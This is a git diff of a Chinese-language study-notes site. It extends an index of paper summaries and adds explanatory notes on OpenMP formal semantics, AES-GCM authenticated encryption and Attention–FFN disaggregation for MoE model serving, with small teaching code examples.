Relational Database Systems — 把 WCO Join 搬进通用 RDBMS](/study/papers/wco-joins-relational-2020/) | ✅ v3 | 数据库 | 存储与查询 | +| `webauthn-fido2` | [WebAuthn Level 2 — 用公钥凭证替代密码的 Web 标准](/study/papers/webauthn-fido2/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `websocket-rfc-6455` | [WebSocket RFC 6455 — 让浏览器和服务器开一条不挂断的双向电话](/study/papers/websocket-rfc-6455/) | ✅ v3 | 网络协议 | 网络协议 | | `webxskill` | [WebXSkill — 给 Web agent 的可执行 skill 是参数化代码 + URL 图索引](/study/papers/webxskill/) | ✅ v3 | Agent | 智能体与 LLM | | `whisper-2022` | [Whisper — 68 万小时弱监督训出的语音识别](/study/papers/whisper-2022/) | ✅ v3 | 机器学习 | 模型与训练 | @@ -2242,6 +2419,7 @@ sidebar: | `wide-deep-2016` | [Wide & Deep — 让模型同时学会"记住"和"举一反三"](/study/papers/wide-deep-2016/) | ✅ v3 | 信息检索 | 检索与排序 | | `williams-1983-mipmap` | [Williams 1983 mipmap — 提前烤好金字塔,纹理过滤变 O(1)](/study/papers/williams-1983-mipmap/) | ✅ v3 | 图形学 | 渲染与图形 | | `wireguard-2017` | [WireGuard: Next Generation Kernel Network Tunnel](/study/papers/wireguard-2017/) | ✅ v3 | 网络协议 | 网络协议 | +| `wisckey` | [WiscKey — 把 Key 和 Value 拆开,让 SSD 上的 LSM 树少干冤枉活](/study/papers/wisckey/) | ✅ v3 | 数据库 | 存储与查询 | | `word2vec` | [Word2Vec — 词向量奠基](/study/papers/word2vec/) | ✅ v3 | NLP | NLP | | `world-model-robot-learning-2026` | [机器人世界模型综述 — 预测未来再动手](/study/papers/world-model-robot-learning-2026/) | ✅ v3 | 机器学习 | 机器人与 VLA | | `worldsense-2025` | [WorldSense — 真实世界同步音视频理解 benchmark](/study/papers/worldsense-2025/) | ✅ v3 | 机器学习 | 视频理解 | @@ -2250,6 +2428,7 @@ sidebar: | `xlnet-2019` | [XLNet — 把句子打乱顺序读,借此同时拿到 AR 和双向](/study/papers/xlnet-2019/) | ✅ v3 | 机器学习 | 模型与训练 | | `xtrace-2007` | [X-Trace — 比 Dapper 早 3 年的跨层跨协议追踪框架](/study/papers/xtrace-2007/) | ✅ v3 | 分布式系统 | 共识与复制 | | `yao-garbled-circuits-1986` | [Yao 混淆电路 — 让两人合算函数却互不泄密](/study/papers/yao-garbled-circuits-1986/) | ✅ v3 | 安全与隐私 | 安全与隐私 | +| `yocto-alternatives` | [You probably don't need Yocto, and that's fine — 嵌入式 Linux 不必默认上 Yocto](/study/papers/yocto-alternatives/) | ✅ v3 | 操作系统 | 嵌入式 | | `youtube-two-tower-2019` | [YouTube 双塔召回 — 把 DSSM 搬进推荐并补上两件工业关键](/study/papers/youtube-two-tower-2019/) | ✅ v3 | 信息检索 | 检索与排序 | | `z3-2008` | [Z3 2008 — 把 SMT 工程化到工业默认](/study/papers/z3-2008/) | ✅ v3 | 形式化方法 | 形式化验证 | | `zab-2011` | [Zab — ZooKeeper 怎么把客户端写入按顺序复制到所有副本](/study/papers/zab-2011/) | ✅ v3 | 数据库 | 存储与查询 | @@ -2257,4 +2436,5 @@ sidebar: | `zfs-2003` | [ZFS — 把磁盘当成水池,每滴水都贴标签](/study/papers/zfs-2003/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `zgc` | [ZGC — 让 GC 停顿与堆大小解耦的低延迟回收器](/study/papers/zgc/) | ✅ v3 | 编程语言 | 编程语言 | | `zk-snark` | [zk-SNARK 零知识证明](/study/papers/zk-snark/) | ✅ v3 | 安全与隐私 | 密码学 | +| `zk-snark-pinocchio-2013` | [Pinocchio 2013 — 首个「近乎实用」的可验证计算与 zk-SNARK 工程系统](/study/papers/zk-snark-pinocchio-2013/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `zombie-agents-2602` | [Zombie Agents — 自进化 agent 的长期记忆能被持久化"借尸还魂"](/study/papers/zombie-agents-2602/) | ✅ v3 | Agent | 智能体与 LLM | diff --git a/src/content/docs/papers/a-formal-semantics-of-c-with-openmp-parallelism-arxiv-2605-26527.md b/src/content/docs/papers/a-formal-semantics-of-c-with-openmp-parallelism-arxiv-2605-26527.md new file mode 100644 index 000000000..dd0d6ad7c --- /dev/null +++ b/src/content/docs/papers/a-formal-semantics-of-c-with-openmp-parallelism-arxiv-2605-26527.md @@ -0,0 +1,217 @@ +--- +title: "A Formal Semantics of C with OpenMP Parallelism" +来源: https://arxiv.org/abs/2605.26527 +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +# A Formal Semantics of C with OpenMP Parallelism — 学习笔记 + +## 一、为什么要读这篇论文? + +想象你在餐厅厨房做饭。一个人做菜很简单:按菜谱一步一步来,先切菜、再炒、最后装盘——顺序清清楚楚。 + +现在你雇了五个厨师同时做同一道菜。问题来了: + +- 两个厨师同时去拿同一个盐瓶,谁先拿到? +- 一个厨师把切好的菜放进篮子,另一个厨师还没准备好就端走了——菜是半生不熟的。 +- 一个厨师负责炒菜,另一个负责装盘,但装盘的厨师不知道什么时候炒好,一直在空等。 + +这就是 **OpenMP 并行化** 带来的核心难题。OpenMP 是程序员用来把「串行代码」变成「并行代码」的工具——你只需要在代码里加几行注释(叫 pragma),编译器就会自动帮你生成多线程程序。 + +听起来很美好,对吧?但现实中,**90% 以上的 OpenMP bug 都是数据竞争(race condition)**——多个线程同时读写同一个变量,结果取决于谁"跑得快",而这件事是不可预测的。 + +这篇论文做的事情就是:**给 C 语言加上 OpenMP 之后,程序的执行规则到底是什么?用数学严格地定义出来。** + +> 类比:就像交通规则。开车每个人都知道怎么踩油门,但十字路口红灯停绿灯行——这是一套所有人都遵守的「规则」。这篇论文就是在为 OpenMP 并行程序制定「交通规则」。 + +## 二、核心概念拆解 + +### 2.1 形式语义(Formal Semantics) + +**形式语义**是用数学语言给编程语言下定义。不是"这段代码大概会做什么",而是"这段代码在每一种可能的情况下,精确地会产生什么结果"。 + +类比:你不需要数学家告诉你"苹果从树上掉下来会砸到地面"。但如果你想设计一颗卫星,精确计算它落在哪一秒、哪一米的位置——你就需要牛顿的公式。形式语义就是编程语言的"牛顿公式"。 + +### 2.2 CompCert 编译器 + +CompCert 是由法国 INRIA 研究所开发的一个**经过形式化验证的 C 编译器**。它的特点是:**编译器本身不会引入 bug**。也就是说,如果你写的 C 代码是正确的,那么编译出来的机器码也一定是正确的。 + +这篇论文在 CompCert 的基础上,加了并发扩展,然后再加上 OpenMP 的规则。你可以把它理解成三层蛋糕: + +| 层级 | 内容 | 作用 | +|------|------|------| +| 底层 | CompCert C 语义 | 定义 C 语言每个语句怎么执行 | +| 中层 | 并发扩展 | 允许多个线程同时运行 | +| 顶层 | OpenMP 指令 | 告诉哪些地方该并行、怎么同步 | + +### 2.3 数据竞争(Data Race) + +数据竞争是最常见的并行 bug。简单说就是:**两个线程同时访问同一个内存位置,其中至少一个是写操作,而且它们之间没有同步机制。** + +类比:两个人同时在一本账本上写字。A 要写"收入 100 元",B 要写"支出 50 元"。如果两人同时动笔,最后账本上的数字可能是错的——因为 B 看到的可能还是 A 写完之前的旧值。 + +### 2.4 OpenMP 的关键指令 + +OpenMP 用 `#pragma` 注释告诉编译器哪里可以并行: + +```c +#pragma omp parallel num_threads(4) +{ + // 这段代码会被 4 个线程同时执行 +} +``` + +最常用的指令: + +- `parallel`:创建一组线程来并行执行 +- `for`:把循环拆给多个线程(循环并行化) +- `critical`:保证某段代码同一时间只有一个线程在执行(互斥) +- `atomic`:保证某个变量的读写是原子的(不可分割) +- `barrier`:所有线程到这里停下来,等所有人都到了再继续 + +## 三、代码示例 + +### 示例 1:有数据竞争的代码 + +下面这段代码想计算 1 到 10000 的和,用了 OpenMP 并行化: + +```c +#include +#include + +int main() { + int sum = 0; + + #pragma omp parallel for + for (int i = 1; i <= 10000; i++) { + sum += i; // 多个线程同时修改 sum! + } + + printf("sum = %d\n", sum); + return 0; +} +``` + +**问题在哪?** `sum += i` 实际上分三步:读取 sum 的值 → 加上 i → 写回 sum。如果有四个线程同时执行这一行,它们可能读到的是同一个旧值,然后各自加上自己的 i,最后只写入了一个结果。其他三个线程的计算就**丢失**了。 + +这就像四个人同时往一个存钱罐里放钱,但每人放进去之前都只看一眼"原来有多少",而不是看别人刚放进去之后的金额。 + +### 示例 2:修复后的正确代码 + +用 `critical` 指令修复: + +```c +#include +#include + +int main() { + int sum = 0; + + #pragma omp parallel for + for (int i = 1; i <= 10000; i++) { + #pragma omp critical + { + sum += i; // 同一时间只有一个线程能执行这里 + } + } + + printf("sum = %d\n", sum); + return 0; +} +``` + +`#pragma omp critical` 就像一个**独木桥**:所有线程都要过这座桥去修改 sum,但桥一次只能通过一个人。其他人必须在桥头排队等着。这样就保证了不会丢数据。 + +更好的做法是用 `reduction` 子句: + +```c +#pragma omp parallel for reduction(+:sum) +for (int i = 1; i <= 10000; i++) { + sum += i; // 每个线程有自己的局部 sum,最后自动合并 +} +``` + +`reduction(+:sum)` 的意思是:给每个线程发一个私有的 `sum` 副本,各算各的,最后把所有副本加起来。这样就不需要排队了,效率更高。 + +### 示例 3:论文中涉及的微妙交互 + +这篇论文特别关注的是**指令与变量状态之间的微妙交互**。举个例子: + +```c +int x = 0; + +#pragma omp parallel +{ + #pragma omp master + { + x = 1; // 只有主线程执行 + } + + #pragma omp barrier // 所有线程在这里等 + + // 此时 x 一定是 1 吗? + printf("x = %d\n", x); +} +``` + +直觉上,`x` 应该是 1。但论文指出:**在没有形式语义严格定义的情况下,不同编译器对这种"屏障之后的可见性"可能有不同的理解**。有些编译器可能认为:屏障之后主线程写的 `x` 对其他线程一定可见;有些则可能不保证。 + +这就是这篇论文的核心贡献之一——用形式语义把这类"看起来显然但实际上有歧义"的情况**精确地规定下来**。 + +## 四、论文的主要贡献 + +### 4.1 一套完整的 C + OpenMP 形式语义 + +作者基于 CompCert 的 C 语义和其并发扩展,构建了一套全新的形式语义。这套语义能够描述: + +- 线程如何创建和销毁 +- `parallel`、`for`、`critical`、`barrier` 等指令的精确执行规则 +- 变量在不同线程间的可见性规则 +- 数据竞争的检测条件 + +### 4.2 揭示了之前语义忽略的微妙问题 + +以前的 OpenMP 语义定义(比如操作语义或指称语义)往往把指令和变量状态分开处理,导致某些交互行为被模糊掉了。这篇论文的形式语义把它们统一在一个框架里,暴露出了以前看不到的边缘情况。 + +### 4.3 无数据竞争的保证 + +论文证明了一个重要性质:**任何成功执行完毕的程序都不会包含数据竞争**。换句话说,如果你的程序按照这套语义跑完了,那它一定没有 race condition。这是一个很强的安全保证。 + +类比:就像工厂质检——不是"抽检",而是"每一件都保证合格"。 + +## 五、为什么这对学习者很重要? + +### 5.1 理解并行的本质 + +很多初学者学并行编程时,觉得"加了个 `#pragma` 就能变快"。这篇论文告诉你:**并行不是魔法,它有一套严格的规则**。理解这些规则,你才能写出正确的并行程序。 + +### 5.2 形式思维的训练 + +形式语义训练的是**精确思维**——不只是"这段代码应该能跑",而是"在每一种可能的执行路径下,它的行为是什么"。这种思维方式对所有程序员都有价值。 + +### 5.3 连接理论和实践 + +CompCert 是一个真实存在的编译器,已经被用于航空航天等安全关键领域。这篇论文的工作可以直接集成到 CompCert 中,意味着**理论研究可以落地到实际工程中**。 + +## 六、关键术语表 + +| 术语 | 英文 | 一句话解释 | +|------|------|-----------| +| 形式语义 | Formal Semantics | 用数学精确描述编程语言的含义 | +| 数据竞争 | Data Race | 多个线程同时读写同一变量且未同步 | +| 原子操作 | Atomic Operation | 不可被中断的单步操作 | +| 互斥 | Mutual Exclusion | 同一时间只有一个线程进入临界区 | +| 屏障同步 | Barrier Synchronization | 所有线程到达屏障后一起继续执行 | +| 归约 | Reduction | 每个线程局部计算,最后合并结果 | +| 编译验证 | Verified Compilation | 编译器本身经过数学证明不会出错 | + +## 七、思考题(读完想一想) + +1. 上面示例 3 中,如果把 `barrier` 去掉,`x` 的值还会是 1 吗?为什么? +2. `reduction` 子句为什么比 `critical` 更高效?它在内存模型层面做了什么? +3. 如果你要给 Python 或 Java 写一套类似的 OpenMP 形式语义,最大的挑战会是什么? + +> 这些问题没有标准答案,但思考的过程会让你对并行编程的理解深一层。等你有了自己的想法,可以随时回来对照论文的后续章节。 diff --git a/src/content/docs/papers/abadi-dpsgd-2016.md b/src/content/docs/papers/abadi-dpsgd-2016.md index 49a5b4bf6..2449ce4d9 100644 --- a/src/content/docs/papers/abadi-dpsgd-2016.md +++ b/src/content/docs/papers/abadi-dpsgd-2016.md @@ -152,6 +152,7 @@ for x, y in loader: - [[cheon-ckks-2017]] —— Homomorphic Encryption for Arithmetic of Approximate Numbers - [[duchi-local-dp-2013]] —— Local Privacy and Statistical Minimax Rates - [[dwork-calibrating-noise-2006]] —— 校准噪声与敏感度 — Laplace 机制奠基 +- [[dwork-differential-privacy-2006]] —— 校准噪声与敏感度 — 差分隐私的 Laplace 机制 - [[dwork-dp-icalp-2006]] —— 差分隐私 — ε 与邻接数据集不可区分 - [[dwork-our-data-ourselves-2006]] —— 分布式噪声生成 — 去掉可信管理员也能保护隐私 - [[erlingsson-rappor-2014]] —— RAPPOR — 本地差分隐私随机响应采集 diff --git a/src/content/docs/papers/adam-2014.md b/src/content/docs/papers/adam-2014.md index 1521d25b5..185cea1e8 100644 --- a/src/content/docs/papers/adam-2014.md +++ b/src/content/docs/papers/adam-2014.md @@ -2,7 +2,7 @@ title: Adam — 让深度学习自己挑步长的优化器 来源: 'Kingma & Ba, "Adam: A Method for Stochastic Optimization", ICLR 2015 (arXiv 2014.12)' 日期: 2026-06-01 -子分类: 模型与训练 +子分类: ml 分类: 机器学习 难度: 中级 provenance: pipeline-v3 diff --git a/src/content/docs/papers/aes-gcm-2003.md b/src/content/docs/papers/aes-gcm-2003.md new file mode 100644 index 000000000..c94d55620 --- /dev/null +++ b/src/content/docs/papers/aes-gcm-2003.md @@ -0,0 +1,247 @@ +--- +title: AES-GCM — 一次加密,同时保证机密性与完整性 +来源: https://csrc.nist.gov/csrc/media/projects/block-cipher-techniques/documents/bcm/proposed-modes/gcm/gcm-spec.pdf +日期: 2026-06-13 +子分类: 安全与隐私 +分类: 安全与隐私 +provenance: pipeline-v3 +--- + +## 是什么 + +**Galois/Counter Mode(GCM)** 是一种**认证加密(Authenticated Encryption with Associated Data, AEAD)** 工作模式:对底层 128 位分组密码(几乎总是 AES)跑一遍,就能同时得到**密文**(别人看不懂)和**认证标签 Tag**(别人改不了)。规范由 David McGrew 与 John Viega 在 2004 年前后提出,NIST 在 **SP 800-38D**(2007)中标准化;你给的 PDF 链接正是提交 NIST 前的原始提案稿。 + +日常类比: + +> 你要寄一份**密封合同**给律师。 +> - **Counter 模式加密** = 把正文放进带一次性密码锁的保险箱,每页用不同密钥加密,外人打开只能看到乱码。 +> - **GHASH 认证** = 在信封外再贴一张**防伪封条**:封条上的校验码由「正文密文 + 信封上写的备注(AAD)」一起算出来。收件人拆信时先验封条——封条不对,整封信直接扔掉,**连解密都懒得做**。 +> 两样事在一次算法调用里完成,这就是 GCM 比「先 AES-CBC 加密再 HMAC」省事的地方。 + +GCM 的姊妹模式 **GMAC** 只做认证、不加密明文,相当于「只有封条、没有保险箱」。 + +## 为什么重要 + +不理解 GCM,现代安全协议里大量默认选项都会变成黑盒: + +- **TLS 1.3** 只保留 AEAD 套件,`TLS_AES_128_GCM_SHA256` 是事实上的默认之一(见 [[tls-1-3-rfc8446]]) +- **Signal / WhatsApp** 消息体用 AES-256-GCM 或 ChaCha20-Poly1305(见 [[signal-double-ratchet-2016]]) +- **IPsec ESP、IEEE 802.1AE、Noise 框架** 都把 GCM 列为标准或常用密码 +- **磁盘加密、对象存储客户端加密** 常用 AES-GCM 封装数据密钥 +- 与纯加密(如 AES-CTR)相比,GCM 能检测**主动篡改**;与「加密 + 独立 MAC」相比,GCM **可并行、可流水线**,硬件实现友好 + +## 核心概念 + +### 1. AEAD 的四个输入、两个输出 + +一次 GCM **认证加密**接受: + +| 输入 | 符号 | 含义 | +|------|------|------| +| 密钥 | `K` | 128/192/256 位 AES 密钥 | +| 初始化向量 | `IV`(常叫 **nonce**) | 每次调用必须唯一,推荐 **96 位(12 字节)** | +| 明文 | `P` | 要保密的数据 | +| 关联数据 | `A`(AAD) | **不加密**但参与认证——例如 TLS 记录头、JSON 元数据 | + +输出: + +| 输出 | 含义 | +|------|------| +| 密文 | `C`,与 `P` 等长 | +| 认证标签 | `T`,通常 **128 位(16 字节)**,可截短但不建议低于 96 位 | + +**认证解密**输入 `K, IV, C, A, T`:先验 Tag,失败则**必须**拒绝明文,不能返回「部分解密结果」。 + +### 2. 加密半边:Counter 模式(CTR) + +GCM 的机密性来自 **AES-CTR** 的变体: + +1. 由 `IV` 构造初始计数器块 `Y₀`(96 位 IV 时:`Y₀ = IV || 0³¹ || 1`) +2. 对第 `i` 块明文 `Pᵢ`,计数器 `Yᵢ = inc₃₂(Yᵢ₋₁)`(只递增**低 32 位**) +3. `Cᵢ = Pᵢ ⊕ E(K, Yᵢ)`,`E` 为 AES 单块加密 + +CTR 的好处:**各块独立**,加密与解密同一套逻辑,GPU/ASIC 可深度流水线——这也是 GCM 在高吞吐场景胜过的根本原因之一。 + +### 3. 认证半边:GHASH 与伽罗瓦域 GF(2¹²⁸) + +认证标签来自 **GHASH**——在二元伽罗瓦域 **GF(2¹²⁸)** 上的多项式求值: + +1. 计算 **哈希子密钥** `H = E(K, 0¹²⁸)`(用 AES 加密全零块) +2. 把 AAD、密文按规范**填充并串联**,再附加各自**比特长度**(128 位编码) +3. 对串联结果做 GHASH:本质是一串 **「乘 H + 异或」** 的 Horner 式累加,乘法在 GF(2¹²⁸) 里做 +4. 最终 `T = GHASH(...) ⊕ E(K, Y₀)`(与 CTR 初始块再混合一次) + +直觉:GHASH 是**通用哈希(universal hash)** 的实例——在密钥 `H` 保密的前提下,攻击者几乎不可能为另一份 `(A', C')` 凑出相同标签。GF(2¹²⁸) 上的乘法可用 **PCLMULQDQ**(x86)、**PMULL**(ARM)单条指令加速,所以 GCM 在 CPU 上也能很快。 + +### 4. GMAC:只认证、不加密 + +若 `P` 为空、只想要 MAC,GCM 退化为 **GMAC**。用途:认证公开信道上的元数据,或作为更大协议里的消息认证码原语。 + +### 5. IV / Nonce:唯一性是绝对红线 + +| 规则 | 说明 | +|------|------| +| **同一 `K` 下 IV 绝不能重复** | 重复 nonce 会破坏 CTR 的机密性(两段明文 XOR 可泄露)**并**削弱 GHASH 认证强度 | +| 推荐 12 字节随机 IV | 随机 96 位 IV,在密钥生命周期内碰撞概率可忽略(规范上限:单密钥下加密数据量约 **2³² − 2** 个块,即约 64 GB 量级量级需注意) | +| 计数器 IV | 设备本地单调递增也可,但**绝不能**重启后从 0 复用同一密钥 | +| 勿用短随机 + 密钥复用 | 「8 字节随机」在大量连接时碰撞风险需自己建模 | + +规范与 RFC 5116 都强调:**nonce 重用对 GCM 是灾难性的**,不是「稍微变弱」而是可能完全崩溃。 + +### 6. AAD:不加密但要验 + +AAD 典型用法: + +- TLS:**序列号、版本、内容类型** 不进密文但进 MAC +- 存储:**对象元数据、版本号** 明文存放,篡改会被 Tag 拒绝 +- API:**JWT header** 若走 AEAD,常把 alg/kid 放 AAD + +攻击者能看见 AAD,但改一个字节 Tag 就对不上。 + +## 数据流(一图胜千言) + +```text + ┌─────────────────────────────────────┐ + K ───────────────►│ AES │ + │ E(K,0) → H (GHASH 子密钥) │ + │ E(K,Yᵢ) → keystream (CTR 加密) │ + └─────────────────────────────────────┘ + │ + IV ──► Y₀ ──► inc₃₂ ──► Y₁, Y₂, … + │ + P ──► P₁,P₂,… ──XOR──► C₁,C₂,… ═══ C (密文) + │ + A, C (填充+长度) ──► GHASH_H ──► XOR E(K,Y₀) ──► T (Tag) +``` + +解密路径:**先**用同样步骤重算 Tag,与收到的 `T` 做**常量时间比较**;相等再 XOR 解密出 `P`。 + +## 代码示例 + +### 示例 1:Python `cryptography` — 加密、篡改检测、AAD + +```python +from cryptography.hazmat.primitives.ciphers.aead import AESGCM +import os + +key = AESGCM.generate_key(bit_length=128) # 16 字节 +aesgcm = AESGCM(key) +nonce = os.urandom(12) # GCM 推荐 96 位 IV + +plaintext = b"contract clause 7.3: payment due Friday" +aad = b'{"doc_id":"2026-0412","version":3}' # 明文元数据,但受认证保护 + +# 认证加密:返回 密文 || 16字节Tag(库内部分离存储) +ct = aesgcm.encrypt(nonce, plaintext, aad) + +# 正常解密 +pt = aesgcm.decrypt(nonce, ct, aad) +assert pt == plaintext + +# 模拟攻击:篡改密文最后一个字节 +tampered = bytearray(ct) +tampered[-1] ^= 0x01 +try: + aesgcm.decrypt(nonce, bytes(tampered), aad) +except Exception as e: + print("拒绝篡改:", type(e).__name__) # InvalidTag +``` + +要点:`encrypt` / `decrypt` 的 `associated_data` 在两端必须**完全一致**;`decrypt` 验 Tag 失败应抛异常,**不要**吞掉异常后返回垃圾明文。 + +### 示例 2:OpenSSL 命令行 — 与 NIST 测试向量同一套语义 + +```bash +# 128 位密钥、12 字节 IV、16 字节 Tag(OpenSSL 默认 tag 长度) +KEY=00000000000000000000000000000000 +IV=000000000000000000000000 +PT=6b6174206d61747573696b61 # "kat matu sika" 的十六进制示例 + +# 加密(-aes-128-gcm;输出含 tag,需自行记录或从 -tag 取) +echo -n "$PT" | xxd -r -p | openssl enc -aes-128-gcm -K "$KEY" -iv "$IV" -nosalt 2>/dev/null | xxd -p + +# 生产环境请用库 API 并校验返回值;CLI 适合对照 NIST SP 800-38D 附录测试向量 +``` + +对照 NIST 官方 walkthrough 见 [AES-GCM Examples (NIST)](https://csrc.nist.gov/csrc/media/projects/cryptographic-standards-and-guidelines/documents/examples/aes_gcm.pdf)。 + +### 示例 3:Node.js `crypto` — TLS 风格 record + +```javascript +import { randomBytes, createCipheriv, createDecipheriv } from 'node:crypto'; + +const key = randomBytes(32); // AES-256-GCM +const iv = randomBytes(12); +const aad = Buffer.from('TLSInnerPlaintext-type-23'); + +const cipher = createCipheriv('aes-256-gcm', key, iv); +cipher.setAAD(aad); +const enc = Buffer.concat([cipher.update('hello'), cipher.final()]); +const tag = cipher.getAuthTag(); // 默认 16 字节 + +const decipher = createDecipheriv('aes-256-gcm', key, iv); +decipher.setAAD(aad); +decipher.setAuthTag(tag); +const dec = Buffer.concat([decipher.update(enc), decipher.final()]); +console.log(dec.toString()); // hello +``` + +## 与相关模式的对比 + +| 模式 | 机密性 | 完整性 | 并行加密 | 典型场景 | +|------|--------|--------|----------|----------| +| AES-CBC + HMAC | ✓ | ✓(若 MAC-then-encrypt 顺序正确) | 差(链式) | 老 TLS、遗留系统 | +| AES-CTR only | ✓ | ✗ | 好 | 仅防偷看、信道已受物理保护 | +| **AES-GCM** | ✓ | ✓ | **好** | TLS 1.3、VPN、磁盘、消息协议 | +| ChaCha20-Poly1305 | ✓ | ✓ | 好(无 AES-NI 时更快) | 移动端 TLS、Signal | +| AES-GCM-SIV | ✓ | ✓ | 中 | **nonce 误用抗性** 要求高的存储 | + +GCM 不是唯一正确的 AEAD,但在有 **AES 硬件加速** 的服务器侧,它往往是默认最优解。 + +## 实现与使用清单 + +1. **IV 唯一**:随机 12 字节或严格单调计数器;密钥轮换策略与 IV 空间一起设计。 +2. **Tag 长度**:默认 128 位;若带宽极紧,规范允许缩短,但 forgery 概率按 $2^{-t}$ 上升。 +3. **常量时间比较 Tag**:防计时侧信道(高质量库已处理)。 +4. **不要把密钥当 IV**:常见反模式 `IV = key[:12]` 会毁掉语义。 +5. **单密钥数据量上限**:留意 SP 800-38D 对块数、AAD 长度的限制;超大流应分段或换密钥。 +6. **优先用库,别手写 GHASH**:GF 乘法与端序极易写错;OpenSSL、`cryptography`、libsodium(ChaCha 系)、BoringSSL 均成熟。 + +## 安全边界(读规范时要记住的定理直觉) + +SP 800-38D 与 McGrew 原始论文给出两类保证(简化表述): + +- **IND-CPA(机密性)**:在 **nonce 不重复** 的前提下,密文与随机串不可区分。 +- **INT-CTXT(完整性)**:在同样前提下,攻击者无法伪造通过验证的 `(C, A, T)`。 + +**一旦 nonce 重用**,证明前提崩塌——可能通过 XOR 两个密文恢复明文关系,并构造伪造标签。这不是实现 bug,是**模式本身的数学限制**。 + +## 历史与规范线索 + +| 时间 | 事件 | +|------|------| +| 2004 | McGrew & Viega 提出 GCM,强调无专利、可并行 | +| 2005 | 提交 NIST Modes of Operation 进程(你链接的 PDF) | +| 2007 | **NIST SP 800-38D** 正式发布,含 GMAC | +| 2008+ | TLS、IPsec、802.1AE、RFC 5116 AEAD 套件广泛采用 | +| 2024 | NIST 公告将修订 SP 800-38D(跟踪 [CSRC 页面](https://csrc.nist.gov/pubs/sp/800/38/d/final)) | + +设计目标很明确:**在 CTR 的速度上,补上工业级消息认证**,而且适合 ASIC / 多核 CPU 并行。 + +## 与本仓库其他条目的关系 + +- [[tls-1-3-rfc8446]] —— GCM 最大的公开部署面之一 +- [[signal-double-ratchet-2016]] —— 消息层可选用 AES-GCM 作为 AEAD +- [[noise-protocol-framework]] —— `AESGCM` 是 Noise 命名密码之一 +- [[rsa]] —— 混合加密里 RSA/Kyber 只保护短密钥, bulk 数据仍走 AES-GCM +- [[regev-lwe-2005]] —— 后量子 KEM + 经典 AES-GCM 是常见组合 + +## 小结 + +GCM = **CTR 加密** + **GF(2¹²⁸) 上的 GHASH 认证**,一次调用产出密文与 Tag。记住三句话就够上手: + +1. **它是 AEAD**:明文保密,密文和 AAD 防篡改。 +2. **IV 必须每次唯一**:重用 nonce 比用弱密码更致命。 +3. **验 Tag 失败就丢**:不要「先解密试试」。 + +从零实现一遍读密文很容易;工程上应用 **成熟库 + 随机 12 字节 IV + 完整 Tag**,并对照 NIST 测试向量做一次自测,就足以覆盖绝大多数应用场景。 diff --git a/src/content/docs/papers/afd-disagg-moe.md b/src/content/docs/papers/afd-disagg-moe.md new file mode 100644 index 000000000..d1cdceb06 --- /dev/null +++ b/src/content/docs/papers/afd-disagg-moe.md @@ -0,0 +1,322 @@ +--- +title: AFD 设计空间探索 — MoE LLM 推理中的 Attention–FFN 解耦 +来源: https://arxiv.org/abs/2605.28302 +日期: 2026-06-13 +子分类: 共识与复制 +分类: 分布式系统 +provenance: pipeline-v3 +--- + +## 从日常类比开始:快餐店的「前台」与「后厨」 + +想象一家连锁快餐店要同时服务三类顾客: + +- **聊天顾客**:点单短、吃得快(短输入、短输出)。 +- **写代码顾客**:点单长、要慢慢吃(长输入、中等输出)。 +- **Agent 程序员**:带着一整本项目手册来点单(超长 prefix / KV,再续写很长)。 + +店里有两类工种,**天然不适合绑在同一张工位上**: + +| 工种 | 像什么 | 瓶颈 | +|------|--------|------| +| **Attention(注意力)** | 前台收银 + 翻历史订单 | 要反复读「已点过的所有菜」(KV cache),**吃内存带宽** | +| **MoE FFN(专家前馈)** | 后厨多个 specialist 档口 | 大矩阵乘、专家路由,**吃算力**;还要在档口间**传菜**(dispatch/combine) | + +最早大家把整家店当成一个单元排班(**聚合部署**)。后来有人把「高峰点单」和「慢慢出餐」分开(**Prefill–Decode 解耦,P/D**)。这篇论文问的是:**还能不能再拆一层?** 把前台和后厨放到**不同的 GPU 集群**上——这就是 **Attention–FFN Disaggregation(AFD)**。 + +论文 **《How Far Can Disaggregation Go? A Design-Space Exploration of Attention–FFN Disaggregation for Efficient MoE LLM Serving》**(arXiv:[2605.28302](https://arxiv.org/abs/2605.28302),Georgia Tech / Intel / Google 等,2026)用 **AIC++** 框架系统回答:**解耦能走多远?什么时候值得拆?Attention 和 FFN 各用多少张卡?** + +一句话:**不是越拆越好——AFD 用更多 GPU 换更低延迟;在严格 SLO 下,它能让原本「根本跑不起来」的长上下文 MoE 服务变得可行。** + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 类型 | 系统设计 + 设计空间探索(DSE)论文 | +| 核心问题 | Chunked prefill、P/D、AFD 三层解耦,何时划算? | +| 框架 | **AIC++** = AIConfigurator(算子级 GPU 建模)+ AstraSim(网络仿真) | +| 原型 | 基于 vLLM 的 AFD 实现(M×N 二分图 P2P 通信) | +| 评测硬件 | 128× NVIDIA B200,TensorRT-LLM 后端 | +| 评测模型 | DeepSeek-V3.2、GPT-OSS-120B、Qwen3-235B、Nemotron3-120B | +| 关键数字 | 严格 TTFT/TPOT SLO 下,AFD 在 DeepSeek-V3.2 上可达约 **4k tokens/s** 系统吞吐;非 AFD 布局**不可行** | + +论文不是发明 MoE 或 Attention,而是给集群架构师一张**「什么时候拆、拆多少」的地图**。 + +--- + +## 为什么重要 + +### 1. MoE 推理的异质性被「一整块 GPU」掩盖了 + +在一个 Transformer 块里: + +- **Attention**:随上下文变长,KV cache 膨胀 → **memory-bound**(MHA / GQA / MLA / 稀疏注意力表现不同)。 +- **MoE FFN**:Top-K 路由 + 大 GEMM → **compute-bound**,还要 **dispatch(A2F)** 和 **combine(F2A)** 通信。 + +把两者绑在同一组 GPU 上,必然有一方在等另一方——MegaScale-Infer 等先前工作已指出问题;本文进一步问:**和 TP/DP/EP、P/D 叠在一起时,AFD 的边界在哪?** + +### 2. Agent 工作负载把「长 prefix + 严格延迟」推到极致 + +论文用三类代表负载(Table 1): + +| 场景 | Prefix | 输入 ISL | 输出 OSL | +|------|--------|----------|----------| +| Chat | 4k | 512 | 256 | +| Coding | 2k | 4k | 1k | +| Agentic Coding | **524k** | 256 | 8k | + +Agent 场景下 prefix 极大,KV 常驻显存;同时用户仍要求 **TTFT**(首 token 时间)和 **TPOT**(每 token 延迟)达标。聚合部署常因**单卡显存上限**直接 infeasible。 + +### 3. 异构机房趋势让 AFD 从「学术玩具」变「基础设施原语」 + +NVIDIA Groq LPX、Rubin CPX、Intel/SambaNova 